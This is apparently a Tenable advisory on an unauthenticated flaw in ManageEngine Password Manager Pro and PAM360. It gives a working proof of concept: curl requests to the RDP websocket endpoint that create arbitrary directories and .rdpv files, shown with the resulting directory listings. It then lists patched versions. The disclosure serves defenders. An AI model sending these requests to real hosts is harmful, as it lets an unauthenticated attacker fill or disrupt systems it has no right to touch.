Synopsis
Tenable found a vulnerability in ManageEngine Password Manager Pro (PMP) build 12007 that allows an unauthenticated remote attacker to create arbitrary directories and a large number of small-sized files on the PMP host.
POC:
# Use different server parameters to create different directories curl -k -H 'Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ==' -H 'Sec-WebSocket-Version: 13' -H 'Upgrade: websocket' 'https://<pmp-host>:7273/RDP?server=c:\some\path\dir1\aaa&width=1440&height=788' curl -k -H 'Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ==' -H 'Sec-WebSocket-Version: 13' -H 'Upgrade: websocket' 'https://<pmp>:7273/RDP?server=c:\some\path\dir2\aaa&width=1440&height=788' curl -k -H 'Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ==' -H 'Sec-WebSocket-Version: 13' -H 'Upgrade: websocket' 'https://<pmp-host>:7273/RDP?server=c:\some\path\dir3\aaa&width=1440&height=788' C:\Users\Administrator>dir /S /B c:\some\path c:\some\path\dir1 c:\some\path\dir2 c:\some\path\dir3 c:\some\path\dir1\aaa.rdpv c:\some\path\dir2\aaa.rdpv c:\some\path\dir3\aaa.rdpv # Use repeat runs to create multiple separate rdpv files in the same directory curl -k -H 'Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ==' -H 'Sec-WebSocket-Version: 13' -H 'Upgrade: websocket' 'https://<pmp-host>:7273/RDP?server=c:\some\dir\aaa&width=1440&height=788' curl -k -H 'Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ==' -H 'Sec-WebSocket-Version: 13' -H 'Upgrade: websocket' 'https://<pmp-host>:7273/RDP?server=c:\some\dir\aaa&width=1440&height=788' curl -k -H 'Sec-WebSocket-Key: dZ5/5knh6Tky32w9JDXbDQ==' -H 'Sec-WebSocket-Version: 13' -H 'Upgrade: websocket' 'https://<pmp-host>:7273/RDP?server=c:\some\dir\aaa&width=1440&height=788' C:\Users\Administrator>dir c:\some\dir\ Volume in drive C has no label. Volume Serial Number is A453-987D Directory of c:\some\dir 05/10/2022 09:53 PM <DIR> . 05/10/2022 09:53 PM <DIR> .. 05/10/2022 09:53 PM 64 aaa.rdpv 05/10/2022 09:53 PM 64 aaa_1.rdpv 05/10/2022 09:53 PM 64 aaa_2.rdpv
Note that this vulnerability also applies to ManageEngine PAM360 (on https port 8283) and possibly other ManageEngine products.
Solution
Apply appropriate patch per vendor recommendations.
Fixed versions for products known to be affected include:
- ManageEngine Password Manager Pro Version 12.1 build 12101
- ManageEngine PAM360 Version 5.5 build 5510
- ManageEngine Access Manager Plus Version 4.3 build 4303
- ManageEngine OpManager Version 12.6 build 126101
- ManageEngine OpManager Version 12.5 build 125639
Additional References
https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35404.htmlhttps://www.manageengine.com/itom/advisory/cve-2022-35404.html
https://www.manageengine.com/products/passwordmanagerpro/release-notes.html
https://www.manageengine.com/privileged-access-management/release-notes.html
https://www.manageengine.com/privileged-session-management/release-notes.html
https://www.manageengine.com/network-monitoring/help/read-me-complete.html#126101
https://www.manageengine.com/network-monitoring/help/read-me.html
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]